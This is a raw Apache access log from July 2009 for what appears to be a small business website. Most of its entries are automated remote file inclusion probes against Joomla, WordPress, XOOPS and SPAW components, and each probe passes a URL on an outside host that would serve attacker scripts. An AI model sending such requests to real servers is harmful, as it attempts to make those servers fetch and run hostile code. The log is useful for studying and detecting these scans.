122.199.140.158 - - [28/Jul/2009:00:00:23 -0400] "GET /write.php?dir=http://www.kpbclub.ru/copyright? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
122.199.140.158 - - [28/Jul/2009:00:00:23 -0400] "GET /logs/write.php?dir=http://www.kpbclub.ru/copyright? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
65.23.158.226 - - [28/Jul/2009:00:00:24 -0400] "GET /logs/access_log.Q109060300/components/com_performs/performs.php?mosConfig_absolute_path=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
65.23.158.226 - - [28/Jul/2009:00:00:24 -0400] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
65.23.158.226 - - [28/Jul/2009:00:00:24 -0400] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
122.199.140.158 - - [28/Jul/2009:00:00:28 -0400] "GET /logs/access_log.Q109051800/write.php?dir=http://www.kpbclub.ru/copyright? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
72.32.185.24 - - [28/Jul/2009:00:00:32 -0400] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
72.32.185.24 - - [28/Jul/2009:00:00:32 -0400] "GET /logs/access_log.Q109051000//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
72.32.185.24 - - [28/Jul/2009:00:00:32 -0400] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
65.23.158.226 - - [28/Jul/2009:00:00:33 -0400] "GET /logs/access_log.Q109070700/components/com_performs/performs.php?mosConfig_absolute_path=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
72.32.185.24 - - [28/Jul/2009:00:00:47 -0400] "GET /logs/access_log.Q109052700//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
71.202.75.103 - - [28/Jul/2009:00:01:01 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2; .NET CLR 1.1.4322)"
71.202.75.103 - - [28/Jul/2009:00:01:01 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2; .NET CLR 1.1.4322)"
71.202.75.103 - - [28/Jul/2009:00:01:02 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2; .NET CLR 1.1.4322)"
71.202.75.103 - - [28/Jul/2009:00:01:04 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2; .NET CLR 1.1.4322)"
89.234.7.92 - - [28/Jul/2009:00:01:17 -0400] "GET //components/com_fabrik/user_ajax_example.php?mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
89.234.7.92 - - [28/Jul/2009:00:01:17 -0400] "GET //components/com_fabrik/user_ajax_example.php?mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
89.234.7.92 - - [28/Jul/2009:00:01:19 -0400] "GET /logs//components/com_fabrik/user_ajax_example.php?mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
89.234.7.92 - - [28/Jul/2009:00:01:19 -0400] "GET /logs/access_log.Q109070700%20%20//components/com_fabrik/user_ajax_example.php?mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
89.234.7.92 - - [28/Jul/2009:00:01:19 -0400] "GET /logs/access_log.Q109070700%20%20//components/com_fabrik/user_ajax_example.php?mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
89.234.7.92 - - [28/Jul/2009:00:01:19 -0400] "GET /logs//components/com_fabrik/user_ajax_example.php?mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
89.234.7.92 - - [28/Jul/2009:00:01:20 -0400] "GET //components/com_fabrik/user_ajax_example.php?mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
89.234.7.92 - - [28/Jul/2009:00:01:22 -0400] "GET /logs//components/com_fabrik/user_ajax_example.php?mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
89.234.7.92 - - [28/Jul/2009:00:01:22 -0400] "GET /logs/access_log.Q109070700%20%20//components/com_fabrik/user_ajax_example.php?mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
89.234.7.92 - - [28/Jul/2009:00:01:23 -0400] "GET /logs/access_log.Q109062200%20%20//components/com_fabrik/user_ajax_example.php?mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
89.234.7.92 - - [28/Jul/2009:00:01:23 -0400] "GET /logs/access_log.Q109062200%20%20//components/com_fabrik/user_ajax_example.php?mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
89.234.7.92 - - [28/Jul/2009:00:01:26 -0400] "GET /logs/access_log.Q109062200%20%20//components/com_fabrik/user_ajax_example.php?mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
122.199.140.158 - - [28/Jul/2009:00:01:41 -0400] "GET /logs/access_log.Q109051300/write.php?dir=http://www.kpbclub.ru/copyright? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
72.32.185.24 - - [28/Jul/2009:00:02:15 -0400] "GET /logs/access_log.Q109051000%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
72.32.185.24 - - [28/Jul/2009:00:02:24 -0400] "GET /logs/access_log.Q109052700%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
65.23.158.226 - - [28/Jul/2009:00:03:10 -0400] "GET /logs/access_log.Q109060300%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
65.23.158.226 - - [28/Jul/2009:00:03:11 -0400] "GET /logs/access_log.Q109070700%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
89.234.7.92 - - [28/Jul/2009:00:04:04 -0400] "GET /logs/access_log.Q109070700//components/com_fabrik/user_ajax_example.php?mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
89.234.7.92 - - [28/Jul/2009:00:04:04 -0400] "GET /logs/access_log.Q109070700//components/com_fabrik/user_ajax_example.php?mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
89.234.7.92 - - [28/Jul/2009:00:04:05 -0400] "GET /logs/access_log.Q109070700//components/com_fabrik/user_ajax_example.php?mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
89.234.7.92 - - [28/Jul/2009:00:04:09 -0400] "GET /logs/access_log.Q109071900//components/com_fabrik/user_ajax_example.php?mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
89.234.7.92 - - [28/Jul/2009:00:04:11 -0400] "GET /logs/access_log.Q109071900//components/com_fabrik/user_ajax_example.php?mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
89.234.7.92 - - [28/Jul/2009:00:04:11 -0400] "GET /logs/access_log.Q109071900//components/com_fabrik/user_ajax_example.php?mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
220.231.126.252 - - [28/Jul/2009:00:04:20 -0400] "GET /logs/access_log.Q109052900//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
220.231.126.252 - - [28/Jul/2009:00:04:50 -0400] "GET /logs/access_log.Q109051500//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
208.113.167.8 - - [28/Jul/2009:00:05:01 -0400] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
208.113.167.8 - - [28/Jul/2009:00:05:01 -0400] "GET /logs/access_log.Q109052100//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
208.113.167.8 - - [28/Jul/2009:00:05:01 -0400] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
208.113.167.8 - - [28/Jul/2009:00:05:04 -0400] "GET /logs/access_log.Q109061100//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
207.58.140.78 - - [28/Jul/2009:00:05:11 -0400] "GET //admin/editor2/spaw_control.class.php?spaw_root=http://www.drumzine.com/fx29id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
207.58.140.78 - - [28/Jul/2009:00:05:11 -0400] "GET /logs/access_log.Q109052100%20%20//admin/editor2/spaw_control.class.php?spaw_root=http://www.drumzine.com/fx29id1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
207.58.140.78 - - [28/Jul/2009:00:05:11 -0400] "GET /logs//admin/editor2/spaw_control.class.php?spaw_root=http://www.drumzine.com/fx29id1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
207.58.140.78 - - [28/Jul/2009:00:05:11 -0400] "GET //admin/editor2/spaw_control.class.php?spaw_root=http://www.drumzine.com/fx29id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
207.58.140.78 - - [28/Jul/2009:00:05:12 -0400] "GET /logs//admin/editor2/spaw_control.class.php?spaw_root=http://www.drumzine.com/fx29id1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
207.58.140.78 - - [28/Jul/2009:00:05:12 -0400] "GET /logs/access_log.Q109052100%20%20//admin/editor2/spaw_control.class.php?spaw_root=http://www.drumzine.com/fx29id1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
207.58.140.78 - - [28/Jul/2009:00:05:25 -0400] "GET /logs/access_log.Q109071500%20%20//admin/editor2/spaw_control.class.php?spaw_root=http://www.drumzine.com/fx29id1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
207.58.140.78 - - [28/Jul/2009:00:05:27 -0400] "GET /logs/access_log.Q109071500%20%20//admin/editor2/spaw_control.class.php?spaw_root=http://www.drumzine.com/fx29id1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
208.113.221.110 - - [28/Jul/2009:00:06:04 -0400] "GET /inurl:topic.php?id= HTTP/1.1" 404 213 "-" "-"
208.113.221.110 - - [28/Jul/2009:00:06:05 -0400] "GET /logs/error_log.Q109051400%20/inurl:topic.php?id= HTTP/1.1" 404 240 "-" "-"
208.113.221.110 - - [28/Jul/2009:00:06:05 -0400] "GET /logs/inurl:topic.php?id= HTTP/1.1" 404 218 "-" "-"
207.58.140.78 - - [28/Jul/2009:00:07:29 -0400] "GET //admin/editor2/spaw_control.class.php?spaw_root=http://www.drumzine.com/fx29id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
207.58.140.78 - - [28/Jul/2009:00:07:30 -0400] "GET /logs/access_log.Q109071500//admin/editor2/spaw_control.class.php?spaw_root=http://www.drumzine.com/fx29id1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
207.58.140.78 - - [28/Jul/2009:00:07:30 -0400] "GET /logs//admin/editor2/spaw_control.class.php?spaw_root=http://www.drumzine.com/fx29id1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
207.58.140.78 - - [28/Jul/2009:00:07:32 -0400] "GET //admin/editor2/spaw_control.class.php?spaw_root=http://www.drumzine.com/fx29id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
207.58.140.78 - - [28/Jul/2009:00:07:32 -0400] "GET /logs//admin/editor2/spaw_control.class.php?spaw_root=http://www.drumzine.com/fx29id1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
207.58.140.78 - - [28/Jul/2009:00:07:32 -0400] "GET /logs/access_log.Q109071500//admin/editor2/spaw_control.class.php?spaw_root=http://www.drumzine.com/fx29id1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
113.87.232.112 - - [28/Jul/2009:00:07:39 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; CIBA)"
113.87.232.112 - - [28/Jul/2009:00:07:39 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; CIBA)"
113.87.232.112 - - [28/Jul/2009:00:07:41 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; CIBA)"
113.87.232.112 - - [28/Jul/2009:00:07:41 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; CIBA)"
207.58.140.78 - - [28/Jul/2009:00:08:03 -0400] "GET /logs/access_log.Q109070900//admin/editor2/spaw_control.class.php?spaw_root=http://www.drumzine.com/fx29id1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
208.113.167.8 - - [28/Jul/2009:00:08:03 -0400] "GET /logs/access_log.Q109052100%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
207.58.140.78 - - [28/Jul/2009:00:08:05 -0400] "GET /logs/access_log.Q109070900//admin/editor2/spaw_control.class.php?spaw_root=http://www.drumzine.com/fx29id1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
208.113.167.8 - - [28/Jul/2009:00:08:05 -0400] "GET /logs/access_log.Q109061100%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
218.38.18.31 - - [28/Jul/2009:00:08:11 -0400] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
218.38.18.31 - - [28/Jul/2009:00:08:11 -0400] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
218.38.18.31 - - [28/Jul/2009:00:08:12 -0400] "GET /logs/access_log.Q109052100//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
218.38.18.31 - - [28/Jul/2009:00:08:20 -0400] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
218.38.18.31 - - [28/Jul/2009:00:08:20 -0400] "GET /logs/access_log.Q109052100//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
218.38.18.31 - - [28/Jul/2009:00:08:21 -0400] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
218.38.18.31 - - [28/Jul/2009:00:08:35 -0400] "GET /logs/access_log.Q109061100//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
66.249.71.204 - - [28/Jul/2009:00:08:32 -0400] "GET /images/ HTTP/1.1" 200 49414 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
218.38.18.31 - - [28/Jul/2009:00:08:43 -0400] "GET /logs/access_log.Q109061100//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
89.234.7.92 - - [28/Jul/2009:00:08:54 -0400] "GET /logs/access_log.Q109062200//components/com_fabrik/user_ajax_example.php?mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
89.234.7.92 - - [28/Jul/2009:00:09:05 -0400] "GET /logs/access_log.Q109062200//components/com_fabrik/user_ajax_example.php?mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
89.234.7.92 - - [28/Jul/2009:00:09:12 -0400] "GET /logs/access_log.Q109062200//components/com_fabrik/user_ajax_example.php?mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
89.144.47.101 - - [28/Jul/2009:00:10:06 -0400] "GET /logs/index.php?stranica=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
89.144.47.101 - - [28/Jul/2009:00:10:06 -0400] "GET /index.php?stranica=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
89.144.47.101 - - [28/Jul/2009:00:10:06 -0400] "GET /logs/access_log.Q109060900/index.php?stranica=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
209.59.12.99 - - [28/Jul/2009:00:10:06 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
202.125.45.45 - - [28/Jul/2009:00:12:16 -0400] "GET /logs/access_log.Q109051300/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 268 "-" "libwww-perl/5.805"
202.125.45.45 - - [28/Jul/2009:00:12:16 -0400] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
202.125.45.45 - - [28/Jul/2009:00:12:35 -0400] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 246 "-" "libwww-perl/5.805"
202.125.45.45 - - [28/Jul/2009:00:12:35 -0400] "GET /logs/error_log.Q109051300/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 267 "-" "libwww-perl/5.805"
117.110.74.195 - - [28/Jul/2009:00:12:35 -0400] "GET /index.php?stranica=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
117.110.74.195 - - [28/Jul/2009:00:12:36 -0400] "GET /logs/access_log.Q109060900/index.php?stranica=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
117.110.74.195 - - [28/Jul/2009:00:12:36 -0400] "GET /logs/access_log.Q109060900%20%20/index.php?stranica=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
117.110.74.195 - - [28/Jul/2009:00:12:36 -0400] "GET /logs/index.php?stranica=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
190.144.44.36 - - [28/Jul/2009:00:12:37 -0400] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.drumzine.com/fx29id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
190.144.44.36 - - [28/Jul/2009:00:12:37 -0400] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.drumzine.com/fx29id1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
190.144.44.36 - - [28/Jul/2009:00:12:37 -0400] "GET /logs/access_log.Q109062500%20%20/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.drumzine.com/fx29id1.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
190.144.44.36 - - [28/Jul/2009:00:12:43 -0400] "GET /logs/access_log.Q109062800%20%20/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.drumzine.com/fx29id1.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
202.125.45.45 - - [28/Jul/2009:00:12:46 -0400] "GET /logs/error_log.Q109070500/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 267 "-" "libwww-perl/5.805"
202.125.45.45 - - [28/Jul/2009:00:12:46 -0400] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
202.125.45.45 - - [28/Jul/2009:00:12:46 -0400] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 246 "-" "libwww-perl/5.805"
202.125.45.45 - - [28/Jul/2009:00:12:46 -0400] "GET /logs/access_log.Q109071000/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 268 "-" "libwww-perl/5.805"
117.110.74.195 - - [28/Jul/2009:00:12:51 -0400] "GET /logs/access_log.Q109051900%20%20/index.php?stranica=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
115.88.240.91 - - [28/Jul/2009:00:13:04 -0400] "GET /index.php?stranica=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
115.88.240.91 - - [28/Jul/2009:00:13:04 -0400] "GET /logs/access_log.Q109060900/index.php?stranica=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
115.88.240.91 - - [28/Jul/2009:00:13:04 -0400] "GET /logs/index.php?stranica=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
115.88.240.91 - - [28/Jul/2009:00:13:09 -0400] "GET /logs/access_log.Q109060900%20%20/index.php?stranica=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
115.88.240.91 - - [28/Jul/2009:00:13:27 -0400] "GET /logs/access_log.Q109051900%20%20/index.php?stranica=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
117.110.74.195 - - [28/Jul/2009:00:14:08 -0400] "GET /logs/access_log.Q109051900/index.php?stranica=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
115.88.240.91 - - [28/Jul/2009:00:14:22 -0400] "GET /logs/access_log.Q109051900/index.php?stranica=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
209.59.12.99 - - [28/Jul/2009:00:15:06 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
125.248.88.155 - - [28/Jul/2009:00:15:09 -0400] "GET /logs/access_log.Q109062200//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.anyche.com/goods_img1/satu.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
125.248.88.155 - - [28/Jul/2009:00:15:10 -0400] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.anyche.com/goods_img1/satu.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
125.248.88.155 - - [28/Jul/2009:00:15:14 -0400] "GET //components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.anyche.com/goods_img1/satu.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
125.248.88.155 - - [28/Jul/2009:00:15:14 -0400] "GET /logs/access_log.Q109070700//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.anyche.com/goods_img1/satu.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
123.125.66.28 - - [28/Jul/2009:00:15:23 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
202.125.45.45 - - [28/Jul/2009:00:15:25 -0400] "GET /logs/error_log.Q109060100%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 268 "-" "libwww-perl/5.805"
190.144.44.36 - - [28/Jul/2009:00:17:15 -0400] "GET /logs/access_log.Q109062500/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.drumzine.com/fx29id1.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
190.144.44.36 - - [28/Jul/2009:00:17:43 -0400] "GET /logs/access_log.Q109062800/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.drumzine.com/fx29id1.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
125.248.88.155 - - [28/Jul/2009:00:17:48 -0400] "GET /logs/access_log.Q109070700%20%20//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.anyche.com/goods_img1/satu.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
125.248.88.155 - - [28/Jul/2009:00:17:55 -0400] "GET /logs/access_log.Q109062200%20%20//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.anyche.com/goods_img1/satu.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
218.38.18.31 - - [28/Jul/2009:00:17:58 -0400] "GET /logs/access_log.Q109051600%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
